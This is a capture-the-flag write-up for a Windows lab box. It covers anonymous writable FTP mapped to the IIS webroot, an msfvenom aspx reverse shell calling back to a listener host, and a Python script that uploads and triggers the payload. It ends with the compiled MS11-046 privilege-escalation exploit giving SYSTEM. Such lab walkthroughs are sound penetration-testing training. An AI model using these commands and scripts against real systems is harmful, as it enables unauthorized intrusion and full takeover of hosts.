MACHINE IP— 10.10.10.5

NMAP
nmap -sCV -p- -A 10.10.10.5 -v

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 09-22-19 04:12AM 2842 devel.aspx
| 03-17-17 05:37PM 689 iisstart.htm
| 09-22-19 04:10AM 4 pw.html
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
From the scan we see that anonymous login is enabled on the FTP server.
After logging in to FTP we find that we also have permission to write to the server (an anonymous-writable FTP root is already a finding on its own).
On FTP we got:

NOTE :- shell1.aspx in that listing is my own file (read below to see how and why it got there).
Here we see there are some files on FTP. Now let's check whether this FTP directory is the same directory the web server serves.
Let's try requesting welcome.png from http://10.10.10.5/welcome.png

BINGOO!!!!! (the FTP files are accessible from the web, so the anonymous-writable FTP root is the IIS webroot)
So let's make a reverse shell payload, upload it over FTP and call it from the web. IIS 7.5 executes .aspx pages server-side, so an aspx payload will run as soon as we request it.
making payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx > shell1.aspx
-p = payload type
LHOST = listener ip
LPORT = listener port
-f = output format
So we have created shell1.aspx. Let's move forward and upload it to FTP; before putting the shell on FTP switch the session to binary mode (ftp> binary) so the file is not altered in transfer, then upload it:
ftp> put shell1.aspx
(put is the command for uploading a file to the FTP server)
As we gave LPORT 4444 in the payload, start nc listening on port 4444 before triggering the shell:
nc -lvp 4444
Now it's time to call shell1.aspx to get the shell:
open http://10.10.10.5/shell1.aspx in your browser (the browser request will keep loading for as long as the shell is alive; that is expected)
and we get a shell at our nc listener.
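The check and the upload above, as an added example (not code from the original write-up): parse the nmap ftp-anon listing, confirm the FTP root is the webroot by comparing each static file's FTP size with its HTTP body length, and only then upload a file over anonymous FTP in binary mode and request it over HTTP. The listing is copied from the scan output on this page; the host, URL and anonymous password are assumptions, and `fetch` is injectable so the comparison logic can be exercised offline.

```python
"""Is the anonymous-writable FTP root the same directory IIS serves?

Added example, not part of the original write-up. Host and URL below are
the ones used in the write-up; the FTP listing is the nmap output on the page.
"""
import re
import urllib.error
import urllib.request
from ftplib import FTP

# Constructed input: the ftp-anon lines from the nmap scan on this page.
NMAP_FTP_ANON = """\
| 03-18-17 02:06AM <DIR> aspnet_client
| 09-22-19 04:12AM 2842 devel.aspx
| 03-17-17 05:37PM 689 iisstart.htm
| 09-22-19 04:10AM 4 pw.html
|_03-17-17 05:37PM 184946 welcome.png
"""

# date, time, <DIR> or size, name. Accepts '-' or an en-dash in the date
# because copy-pasted scan output often has the latter.
LINE_RE = re.compile(
    r"^\|_?\s*(\d{2}[-\u2013]\d{2}[-\u2013]\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(\S.*)$"
)


def parse_ftp_anon(text):
    """Return [(name, size)] from nmap ftp-anon lines; size is None for a directory."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        size = None if m.group(3) == "<DIR>" else int(m.group(3))
        entries.append((m.group(4).strip(), size))
    return entries


def http_size(url, timeout=5):
    """Body length of a GET to url, or None on any HTTP or network error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return len(resp.read())
    except (urllib.error.URLError, OSError):
        return None


def shared_files(entries, base_url, fetch=http_size):
    """Names whose HTTP body length equals their FTP size.

    A match on static files (png, htm) is evidence that the FTP root and the
    webroot are one directory. .aspx files execute on request, so their
    rendered body normally differs from the size on disk; they are compared
    too but are not expected to match.
    """
    base = base_url.rstrip("/")
    hits = []
    for name, size in entries:
        if size is None:  # directory: nothing to compare
            continue
        if fetch(f"{base}/{name}") == size:
            hits.append(name)
    return hits


def upload_and_trigger(host, local_path, base_url, user="anonymous", passwd="anon@"):
    """Upload local_path over anonymous FTP in binary mode, then GET it over HTTP.

    Returns the HTTP status code, or None if the request errored or timed out.
    For a reverse-shell .aspx the request does not return until the shell
    process exits, so a timeout here is normal: check the listener instead.
    """
    name = local_path.rsplit("/", 1)[-1]
    with FTP(host, timeout=10) as ftp:
        ftp.login(user, passwd)
        with open(local_path, "rb") as fh:
            ftp.storbinary(f"STOR {name}", fh)  # TYPE I, same as 'ftp> binary' + 'put'
    try:
        with urllib.request.urlopen(f"{base_url.rstrip('/')}/{name}", timeout=10) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as e:
        return e.code
    except (urllib.error.URLError, OSError):
        return None


if __name__ == "__main__":
    entries = parse_ftp_anon(NMAP_FTP_ANON)
    print("shared:", shared_files(entries, "http://10.10.10.5"))
    # upload_and_trigger("10.10.10.5", "shell1.aspx", "http://10.10.10.5")
```

Run the comparison first; if no static file matches, the FTP root is not the webroot and uploading a payload there gains nothing. Only files that are served unchanged give a clean size match, which is why the write-up's welcome.png request is the right probe and a .aspx file would not be.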

As we are only the low-privileged IIS application pool user we don't have permission to read other users' folders, so here we have to do privilege escalation.
Run the systeminfo command for the system information.
Here we got OS Version: 6.1.7600 N/A Build 7600, i.e. Windows 7 / Server 2008 R2 with no service pack installed.
Let's see if this version is vulnerable to a known local privilege escalation.
YUP!!! found the exploit on Exploit-DB {EDB-ID: 40564}, the MS11-046 afd.sys local privilege escalation.
We can fetch this exploit directly on our Linux box with searchsploit:
searchsploit -m 40564
Reading the exploit source we get the hints for compiling it:
i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
(the exploit targets 32-bit Windows, hence the i686 cross-compiler, and it uses Winsock, hence -lws2_32)
Now we have the compiled MS11-046.exe; the main work is to transfer it to the Windows box for privilege escalation.
Remember we have write permission on FTP, so again we send the file over FTP.
Here we have to enable binary transfer in our FTP session; enter the command below to enable it, then upload:
ftp> binary
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.
In our shell we now move to c:\inetpub\wwwroot (the IIS webroot, where the FTP upload landed) and there we find our MS11-046.exe.
Now we just have to run it; the exploit spawns a new cmd as SYSTEM:
c:\inetpub\wwwroot>MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system
Now we have SYSTEM privileges and can read any user's profile/directory.
Got root at C:\Users\Administrator\Desktop\root.txt.txt
type root.txt.txt
Got user at C:\Users\babis\Desktop\user.txt.txt
type user.txt.txt
COWABUNGA !!!!!!!!